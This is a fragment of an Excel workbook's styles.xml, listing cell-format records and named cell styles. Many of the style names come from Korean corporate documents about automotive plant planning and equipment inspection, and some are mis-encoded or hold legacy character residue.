    <xf numFmtId="0" fontId="29" fillId="2" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="15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38" fontId="38" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="3" fontId="19" fillId="0" borderId="2">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" applyNumberForma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30" fillId="22" borderId="3" applyNumberFormat="0" applyFont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09" fontId="42" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="214" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf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4" borderId="4" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="43" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="188" fontId="47" fillId="23" borderId="5">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="41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13" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="204" fontId="20" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="21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01" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="37" fontId="19" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="210" fontId="49" fillId="0" borderId="6" applyBorder="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf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0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="8" borderId="1" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="4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9" fillId="5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf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21" borderId="12" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="209" fontId="42" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="214" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="209" fontId="42" fillId="0" borderId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9" fontId="42" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="214" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="44" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="209" fontId="42" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="42" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="10" fontId="34" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="209" fontId="42" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="214" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="13" applyNumberFormat="0" applyFill="0">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="194" fontId="13" fillId="0" borderId="14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212" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyAlignment="0">
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="61" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="15" applyNumberFormat="0" applyFont="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="205" fontId="53" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="206" fontId="53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21" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="191" fontId="68" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="191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21" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="192" fontId="68" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="192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44" fontId="7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" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="183" fontId="64" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="184" fontId="6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8" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="69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16" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="181" fontId="68" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="181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68" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0">
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0">
      <protection/>
    </xf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215" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="182" fontId="68" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="182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16">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="82" fillId="25" borderId="14">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="66" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="83" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="66" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="66" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="66" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="84" fillId="0" borderId="0" applyNumberFormat="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="85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86" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="72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72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71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16" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="73" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="72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89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90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71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91" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="68" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="92" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="93" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="72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73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72" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="68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94" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="93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76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71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76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89" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="84" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="71" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="70" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="99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93" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="70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16" fillId="0" borderId="0" applyBorder="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="68" fillId="0" borderId="0" applyBorder="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="100" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="71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76" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="69" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="76" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="69" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="15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29" fillId="0" borderId="17">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="38" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="208" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="182" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="10" fontId="105" fillId="0" borderId="0">
      <alignment horizontal="right"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="17">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0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0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="218" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0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08" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="223" fontId="106" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="224" fontId="106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7" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="218" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="38" fontId="107" fillId="26" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="108" fillId="0" borderId="0">
      <alignment horizontal="left"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="0" borderId="18" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="109" fillId="0" borderId="19">
      <alignment horizontal="left" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="218" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="218" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="10" fontId="107" fillId="26" borderId="13" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="110" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyProtection="0">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="196" fontId="15" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="111" fillId="0" borderId="20">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="197" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="37" fontId="112" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="187" fontId="19" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="21" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="21" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="106" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="194" fontId="113" fillId="27" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="105" fillId="0" borderId="0">
      <alignment horizontal="right" vertical="top"/>
      <protection/>
    </xf>
    <xf numFmtId="40" fontId="41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NumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="114" fillId="28" borderId="14">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="15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3" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="111" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="218" fontId="0" fillId="0" borderId="22">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="38" fontId="19" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="195" fontId="78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29" borderId="23" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="119" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="120" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="219" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="220" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="221" fontId="106" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="222" fontId="106" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0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7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20" fontId="11" fillId="0" borderId="30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22" fillId="5" borderId="0" xfId="189" applyFont="1" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="189">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="5" borderId="0" xfId="189" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="23" borderId="39" xfId="189" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="30" borderId="38" xfId="189" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="123" fillId="31" borderId="40" xfId="189" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="124" fillId="32" borderId="41" xfId="189" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="123" fillId="31" borderId="41" xfId="189" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="123" fillId="31" borderId="42" xfId="189" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="30" borderId="43" xfId="189" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="23" borderId="44" xfId="189" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="30" borderId="44" xfId="189" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="23" borderId="45" xfId="189" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="32" borderId="31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0" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="30" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="30" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="30" borderId="3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36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="30" borderId="30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11" fillId="23" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="23" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="23" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="23" borderId="31" xfId="0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/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="12" borderId="30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7" fillId="23" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="20" fontId="11" fillId="23" borderId="30" xfId="0" applyNumberFormat="1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10" fillId="30" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="30" borderId="46" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="32" borderId="47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/>
    </xf>
    <xf numFmtId="0" fontId="125" fillId="12" borderId="4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10" fillId="23" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="30" borderId="28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11" fillId="37" borderId="30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3" fillId="39" borderId="47" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="30" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="32" borderId="49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5" borderId="13" xfId="0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20" fontId="11" fillId="0" borderId="28" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="20" fontId="11" fillId="0" borderId="38" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="20" fontId="11" fillId="0" borderId="26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30" borderId="29" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="30" borderId="50" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="30" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="30" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="30" borderId="48" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="30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3" fillId="23" borderId="29" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="23" borderId="53" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="23" borderId="36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="32" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="32" borderId="38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/>
    </xf>
    <xf numFmtId="20" fontId="11" fillId="30" borderId="28" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="20" fontId="11" fillId="30" borderId="38" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="20" fontId="11" fillId="30" borderId="26" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="30" borderId="54" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="11" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="11" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="11" borderId="48" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="11" borderId="27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50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horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="32" borderId="54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7" fillId="39" borderId="48" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="39" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder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0" fontId="130" fillId="0" borderId="25" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="39" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="39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</cellXfs>
  <cellStyles count="73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_x0003_" xfId="15"/>
    <cellStyle name="          &#13;&#10;386grabber=vga.3gr&#13;&#10;" xfId="16"/>
    <cellStyle name=" bolted_전체 LAY-OUT" xfId="17"/>
    <cellStyle name="&#13;&#10;386grabber=vga.3gr&#13;&#10;" xfId="18"/>
    <cellStyle name=")" xfId="19"/>
    <cellStyle name=")omma_9월경비 (2)_97회비 (2)_1월회비내역ͬ(2)" xfId="20"/>
    <cellStyle name="?? [0]_CODE (2)BU" xfId="21"/>
    <cellStyle name="??&amp;O?&amp;H?_x0008__x000F__x0007_?_x0007__x0001__x0001_" xfId="22"/>
    <cellStyle name="??&amp;O?&amp;H?_x0008_??_x0007__x0001__x0001_" xfId="23"/>
    <cellStyle name="???? [0.00]_PRODUCT DETAIL Q1can " xfId="24"/>
    <cellStyle name="????_PRODUCT DETAIL Q1TAIL" xfId="25"/>
    <cellStyle name="??_ALGERIA MEETING" xfId="26"/>
    <cellStyle name="_03년 장비점검계획(차체1-4분기)(1)" xfId="27"/>
    <cellStyle name="_03년 장비점검계획(차체1-4분기)(3)" xfId="28"/>
    <cellStyle name="_1" xfId="29"/>
    <cellStyle name="_2" xfId="30"/>
    <cellStyle name="_4월 가동율향상 1차 개선방안 실행보고(3공장_의장보전)- 2004.05.11" xfId="31"/>
    <cellStyle name="_각사 생산성비교(10.9)" xfId="32"/>
    <cellStyle name="_구매조정실보고양식0310" xfId="33"/>
    <cellStyle name="_국산화계획" xfId="34"/>
    <cellStyle name="_부품개발정책(보고중.0915)" xfId="35"/>
    <cellStyle name="_북경장님보고(0502)1200FULLVER(1)" xfId="36"/>
    <cellStyle name="_업무분장안0427" xfId="37"/>
    <cellStyle name="_업무분장안0427_1" xfId="38"/>
    <cellStyle name="_업무분장안0427_1_Book1" xfId="39"/>
    <cellStyle name="_업무분장안0427_2" xfId="40"/>
    <cellStyle name="_업무분장안0427_3" xfId="41"/>
    <cellStyle name="_업무분장안0427_3_Book1" xfId="42"/>
    <cellStyle name="_업무분장안0427_4" xfId="43"/>
    <cellStyle name="_업무분장안0427_4_Book1" xfId="44"/>
    <cellStyle name="_업무분장안0427_4_Book1_1" xfId="45"/>
    <cellStyle name="_업무분장안0427_4_Book1_Book1" xfId="46"/>
    <cellStyle name="_업무분장안0427_5" xfId="47"/>
    <cellStyle name="_업무분장안0427_5_Book1" xfId="48"/>
    <cellStyle name="_업무분장안0427_Book1" xfId="49"/>
    <cellStyle name="_엑슬이송 풋스위치 공장간 비교" xfId="50"/>
    <cellStyle name="_전창헌-1212-업무추진계획" xfId="51"/>
    <cellStyle name="_중장기전략신2" xfId="52"/>
    <cellStyle name="_파키스탄 수정 LAY OUT" xfId="53"/>
    <cellStyle name="_파키스탄 현황" xfId="54"/>
    <cellStyle name="_하반기 추진테마별 활동계획(샘플 생산)- 2004.09.03" xfId="55"/>
    <cellStyle name="_하반기 추진테마별 활동계획(의장1부)- 2004.09.06(최종)" xfId="56"/>
    <cellStyle name="_Book1" xfId="57"/>
    <cellStyle name="_Book1_%EB%A9%B4%EB%8B%B4%EC%96%91%EC%8B%9D" xfId="58"/>
    <cellStyle name="_Book1_1" xfId="59"/>
    <cellStyle name="_Book1_Book1" xfId="60"/>
    <cellStyle name="_Book1_Book1_Book1" xfId="61"/>
    <cellStyle name="_CPAD장착기 공장간 비교(수평전개)" xfId="62"/>
    <cellStyle name="_DR탈착장 센서 공장간 비교" xfId="63"/>
    <cellStyle name="_LD 중량경감 방안_ENG MTG_3" xfId="64"/>
    <cellStyle name="_LD 중량경감 방안_INSULATOR_4" xfId="65"/>
    <cellStyle name="_PROJECT_CUR" xfId="66"/>
    <cellStyle name="¤@?e_TEST-1 " xfId="67"/>
    <cellStyle name="¥ìU¢¯¢® ¢¯A¢¥A CIAI¨¡U¢¬¥ìA¨Ï" xfId="68"/>
